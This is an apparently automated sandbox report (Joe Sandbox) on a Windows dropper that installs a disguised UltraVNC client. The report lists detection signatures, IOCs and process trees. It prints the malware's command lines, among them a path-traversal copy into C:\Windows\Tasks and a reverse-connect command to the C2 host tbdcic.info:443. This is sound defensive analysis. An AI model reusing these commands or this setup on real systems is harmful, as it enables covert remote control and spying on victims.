Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7q551ugrWe.exe

Overview

General Information

Sample name:7q551ugrWe.exe
renamed because original name is a hash value
Original sample name:c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4.exe
Analysis ID:1579876
MD5:d61940626fad051067bfd16f2ab4e657
SHA1:cceaeda73fca724016bac0c9cb000fcd4ca1e523
SHA256:c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4
Tags:exetbdcic-infouser-JAMESWT_MHT
Infos:

Detection

UltraVNC
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Yara detected UltraVNC Hacktool
AI detected suspicious sample
Contains VNC / remote desktop functionality (version string found)
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious UltraVNC Execution
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Process Start Locations
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • 7q551ugrWe.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\7q551ugrWe.exe" MD5: D61940626FAD051067BFD16F2AB4E657)
    • cmd.exe (PID: 7496 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 1832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7556 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7612 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7664 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • Acrobat.exe (PID: 7732 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7928 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 8144 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1724,i,3112944997856603396,2159099869268149404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • timeout.exe (PID: 7748 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 7948 cmdline: taskkill /f /im sync_browser.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 7172 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 3892 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 5624 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 2624 cmdline: C:\Windows\Tasks\sync_browser.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 2284 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 3636 cmdline: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 1528 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 5096 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7580 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 5916 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 2284 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 5756 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\Tasks\sync_browser.exeJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7VJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
      C:\Windows\Tasks\WPSela.LSZr7VJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
        SourceRuleDescriptionAuthorStrings
        00000016.00000000.1454915020.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
          00000019.00000002.1537485169.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
            00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
              00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                  Click to see the 9 entries
                  SourceRuleDescriptionAuthorStrings
                  22.0.sync_browser.exe.7ff67e7c0000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                    25.0.sync_browser.exe.7ff67e7c0000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                      22.2.sync_browser.exe.7ff67e7c0000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                        25.2.sync_browser.exe.7ff67e7c0000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security

                          System Summary

                          barindex
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7612, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 2624, ProcessName: sync_browser.exe
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7612, TargetFilename: C:\Windows\Tasks\conhost.exe
                          Source: Process startedAuthor: Bhabesh Raj: Data: Command: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7612, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443, ProcessId: 3636, ProcessName: sync_browser.exe
                          Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7q551ugrWe.exe", ParentImage: C:\Users\user\Desktop\7q551ugrWe.exe, ParentProcessId: 7404, ParentProcessName: 7q551ugrWe.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 7496, ProcessName: cmd.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7q551ugrWe.exe", ParentImage: C:\Users\user\Desktop\7q551ugrWe.exe, ParentProcessId: 7404, ParentProcessName: 7q551ugrWe.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 7496, ProcessName: cmd.exe
                          Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7612, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 2624, ProcessName: sync_browser.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-23T13:41:06.611036+010020358931Malware Command and Control Activity Detected192.168.2.949930194.190.152.201443TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: 7q551ugrWe.exeReversingLabs: Detection: 23%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
                          Source: 7q551ugrWe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: Binary string: conhost.pdbUGP source: 7q551ugrWe.exe, 00000000.00000003.1347959077.0000000002792000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
                          Source: Binary string: conhost.pdb source: 7q551ugrWe.exe, 00000000.00000003.1347959077.0000000002792000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,22_2_00007FF67E7C5910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,22_2_00007FF67E7E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,22_2_00007FF67E7EC210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E87A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,22_2_00007FF67E87A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,25_2_00007FF67E7C5910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,25_2_00007FF67E7E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,25_2_00007FF67E7EC210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E87A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,25_2_00007FF67E87A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,22_2_00007FF67E7E6DD1
                          Source: Joe Sandbox ViewIP Address: 194.190.152.201 194.190.152.201
                          Source: Network trafficSuricata IDS: 2035893 - Severity 1 - ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon : 192.168.2.9:49930 -> 194.190.152.201:443
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E82D890 EnterCriticalSection,LeaveCriticalSection,recv,WSAGetLastError,WSAGetLastError,LeaveCriticalSection,recv,WSAGetLastError,22_2_00007FF67E82D890
                          Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                          Source: global trafficDNS traffic detected: DNS query: tbdcic.info
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                          Source: 77EC63BDA74BD0D0E0426DC8F80085060.11.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://forum.uvnc.com
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://java.sun.com/products/plugin/index.html#download
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://ocsp.thawte.com0
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454915020.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537485169.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://www.uvnc.com
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drString found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
                          Source: 2D85F72862B55C4EADD9E66E06947F3D0.11.drString found in binary or memory: http://x1.i.lencr.org/
                          Source: ReaderMessages.9.drString found in binary or memory: https://www.adobe.co
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,000000000_2_00408630
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C1DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,22_2_00007FF67E7C1DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C1DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,22_2_00007FF67E7C1DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7F13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,22_2_00007FF67E7F13A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C1DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,25_2_00007FF67E7C1DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7F13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,25_2_00007FF67E7F13A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C1AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,22_2_00007FF67E7C1AE0
